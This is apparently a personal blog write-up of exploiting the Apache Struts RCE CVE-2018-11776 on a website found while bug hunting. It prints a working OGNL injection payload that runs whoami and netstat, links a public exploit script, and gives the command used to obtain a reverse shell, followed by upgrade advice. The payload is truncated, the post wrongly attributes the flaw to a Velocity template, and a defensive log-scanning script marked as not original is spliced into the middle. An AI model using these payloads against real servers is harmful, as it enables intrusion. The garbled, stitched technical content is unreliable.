Apache Struts-2 Remote Code Execution CVE-2018-11776

Sushant Kamble
3 min read · Apr 1, 2020
Apache Struts-2 RCE

Hello Guys,
Today I am going to tell you about my finding on a web-based application. It is a very well-known vulnerability found on Apache Struts-2: RCE (Remote Code Execution).

History Of Apache Struts-2 :-

Apache Struts is one of the popular open-source frameworks and is heavily used by banks and government organizations. It is modern, clean and elegant, but security-wise Struts has not had a good time. An older vulnerability happened to affect all versions of the Struts REST plugin and was also found to impact several Fortune companies. An exploit for it was published, and a lot of web applications were exploited on a massive scale.

How I Started :-

As I was hunting on a few websites I came across this link, and during my recon process I came to know that it was vulnerable to Apache Struts-2. Just to reconfirm and get proper details of the Struts installation, I used an online tool named Contrast. I needed to give the URL to the tool, and it gave me back the whole details of the Apache Struts installation along with the proper parameter for the same.

Contrast showing whole details of the application.

Then, after getting the proper parameter, I tried checking those parameters in Burp Suite with some payloads.

${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’).getWriter(),%23screen.println(%23d),%23screen.close()}”>test.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22netstat%22,%22-an%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java

The payload's result returned the hostname

The vulnerability is then fully triggered by sending a malicious Velocity template via a GET/POST request with a custom Velocity template parameter in a specially crafted request, leading to RCE.

I used this payload on the generated parameters and YES, it gave proper results.

After googling a few links on GitHub I found an exploit available for the same vulnerability, which was prompting for the RCE itself. GitHub here.

We can use the Docker build for Apache Struts and add custom actions to it. I followed what the programmer suggested in his exploit.

Setting up to gain reverse shell :-

1. After doing some Google searching I came across a Python script to gain a reverse shell via that parameter.
2. With some modification of the Python code I was able to get the reverse shell.
3. Here is the Python code: https://github.com/mazen160/struts-pwn_CVE-2018-11776
4. Command:
python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'
5. Then YES, I got a reverse shell for the same.
Reverse shell executed

How to Mitigate :-

All Apache Struts users should upgrade to the latest version and deploy security patches within 24 hours of availability.

If you are running | Upgrade to
Struts 2.3.x | Struts 2.3.35
Struts 2.5.x | Struts 2.5.17
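Two defender-side checks that follow from the table above, as an added example that is not part of the original post or of the struts-pwn project: a version comparison against the fixed releases, and a coarse scan of access-log lines for OGNL expression markers (`${` or `%{`, possibly URL-encoded) in the request target, which is where the payload shown earlier in the post is placed. The log lines are constructed samples in combined log format and carry only harmless placeholder markers.

```python
import re
from urllib.parse import unquote

# Fixed releases from the upgrade table above (branch -> first safe version).
FIXED = {(2, 3): (2, 3, 35), (2, 5): (2, 5, 17)}

def parse_version(text):
    """'2.3.34' / '2.5.16.1' / '2.3.35-SNAPSHOT' -> tuple of the leading integers."""
    return tuple(int(p) for p in re.findall(r"\d+", text)[:3])

def needs_upgrade(version):
    """True if a 2.3.x / 2.5.x Struts version is below the fixed release,
    False if it is at or above it, None for branches the table does not cover."""
    parts = parse_version(version)
    fixed = FIXED.get(parts[:2])
    if fixed is None:
        return None
    return parts < fixed

# OGNL expression markers; '${' and '%{' may arrive URL-encoded, even twice.
OGNL_MARKER = re.compile(r"[$%]\{")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def suspicious_requests(log_lines):
    """Return the fully decoded request targets of access-log lines that carry an
    OGNL expression marker in the path or query (a coarse, high-recall filter)."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        raw = m.group(1)
        once = unquote(raw)
        twice = unquote(once)
        if any(OGNL_MARKER.search(s) for s in (raw, once, twice)):
            hits.append(twice)
    return hits

# Constructed sample log lines (combined log format); the markers are harmless
# placeholders, not exploit code. Line 3 is double-encoded, line 4 is a benign '{'.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2020:10:00:01 +0000] "GET /demo/struts2-showcase/index.action HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Apr/2020:10:00:07 +0000] "GET /demo/struts2-showcase/%24%7B1%2B1%7D/index.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Apr/2020:10:00:09 +0000] "GET /demo/test.action?redirect:%2524%257B1%252B1%257D HTTP/1.1" 302 0',
    '10.0.0.7 - - [01/Apr/2020:10:00:12 +0000] "GET /static/app.js?v=%7B1%7D HTTP/1.1" 200 100',
]
```

Running `suspicious_requests(SAMPLE_LOG)` flags the second and third lines only; the filter is deliberately broad, so review hits against the application's legitimate URL patterns before alerting on them.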

That's all it takes to get an RCE on a vulnerable Apache Struts 2. You can read more about it via the following CVE ID.

Anyway, it was a FUN one. Thanks for reading.

You can connect with me :-

Twitter :- https://twitter.com/imsushantkamble
Linkedin :- https://in.linkedin.com/in/iamsushantkamble
Facebook :- https://www.facebook.com/iamsushantkamble/
